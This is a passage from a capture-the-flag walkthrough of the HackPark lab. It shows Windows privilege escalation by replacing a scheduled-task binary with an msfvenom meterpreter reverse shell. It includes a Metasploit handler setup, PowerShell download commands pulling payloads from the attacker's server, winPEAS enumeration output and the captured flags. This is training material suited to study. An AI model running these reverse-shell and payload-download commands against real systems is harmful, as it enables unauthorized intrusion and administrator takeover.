Time to replace C:\Program Files (x86)\SystemScheduler\Message.exe with a reverse shell. Let’s first generate a new reverse shell (use a new port) that we will name Message.exe:

```
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.**.** LPORT=3456 -f exe -o Message.exe
$ python3 -m http.server
```
In Metasploit, configure the TCP handler:
```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.9.**.**
LHOST => 10.9.**.**
msf5 exploit(multi/handler) > set LPORT 3456
LPORT => 3456
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.**.**:3456
```
In the existing reverse shell, download your new reverse shell to replace the initial Message.exe with it:

```
powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/Message.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
```
After some seconds, we have a meterpreter as Administrator:

```
[*] Sending stage (176195 bytes) to 10.10.79.198
[*] Meterpreter session 1 opened (10.9.**.**:3456 -> 10.10.79.198:52832) at 2020-05-17 19:19:03 +0200

meterpreter > getuid
Server username: HACKPARK\Administrator
meterpreter > cd c:\users\jeff\desktop\
meterpreter > ls
Listing: C:\users\jeff\desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-08-04 20:54:53 +0200  desktop.ini
100666/rw-rw-rw-  32    fil   2019-08-04 20:55:12 +0200  user.txt

meterpreter > cat user.txt
759bd8af507517bcfaede78a21a73e39
```
#4.6 - What is the root flag?
```
meterpreter > cd C:\users\administrator\desktop
meterpreter > ls
Listing: C:\users\administrator\desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  1029  fil   2019-08-04 13:36:42 +0200  System Scheduler.lnk
100666/rw-rw-rw-  282   fil   2019-08-03 19:43:54 +0200  desktop.ini
100666/rw-rw-rw-  32    fil   2019-08-04 20:48:59 +0200  root.txt

meterpreter > cat root.txt
7e13d97f05f7ceb9881a3eb3d78d3e72
```
[Task 5] Privilege Escalation Without Metasploit
#5.0 - Instructions
In this task we will escalate our privileges without the use of meterpreter/metasploit!
Firstly, we will pivot from our netcat session that we have established, to a more stable reverse shell.
Once we have established this we will use winPEAS to enumerate the system for potential vulnerabilities, before using this information to escalate to Administrator.
#5.1 - Now we can generate a more stable shell using msfvenom, instead of using a meterpreter. This time let’s set our payload to windows/shell_reverse_tcp
Let’s first download winPEAS.bat and make it available through our web server:
```
$ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/winPEAS/winPEASbat/winPEAS.bat
$ python -m http.server
```
#5.2 - After generating our payload we need to pull this onto the box using powershell. Tip: It’s common to find C:\Windows\Temp is world writable!
In our reverse shell, we can now download WinPEAS:
```
powershell -c "Invoke-WebRequest -Uri 'http://10.9.**.**:8000/winPEAS.bat' -OutFile 'c:\windows\temp\winpeas.bat'"
```

(The file name in the URI must match the case of the file served from the Linux web server, and the batch script is saved with a .bat extension so it can be run as such in the next step.)
#5.3
Instructions
Now you know how to pull files from your machine to the victim's machine, we can pull winPEAS.bat to the system using the same method! (You can find winPEAS here)
WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!
Tip: You can execute these files by using .\filename.exe
Using winPeas, what was the Original Install time? (This is date and time)
Hint: powershell -c "Invoke-WebRequest -Uri 'ip/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
Answer
WinPEAS is now installed on the target, let’s execute it:
```
.\winpeas.bat
c:\Windows\Temp>.\winpeas.bat
by carlospolop
ECHO is off.
Advisory: winpeas should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
ECHO is off.

 _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [*] BASIC SYSTEM INFO <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

 _-_-_-_-_-_-_-_-_-_-_-_-_-_-_-> [+] WINDOWS OS <_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-
   [i] Check for vulnerabilities for the OS version with the applied patches
   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits

Host Name:                 HACKPARK
OS Name:                   Microsoft Windows Server 2012 R2 Standard Evaluation
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00252-10000-00000-AA228
Original Install Date:     8/3/2019, 10:43:23 AM
...[SNIP]...
```
We see that the original install date is: 8/3/2019, 10:43:23 AM.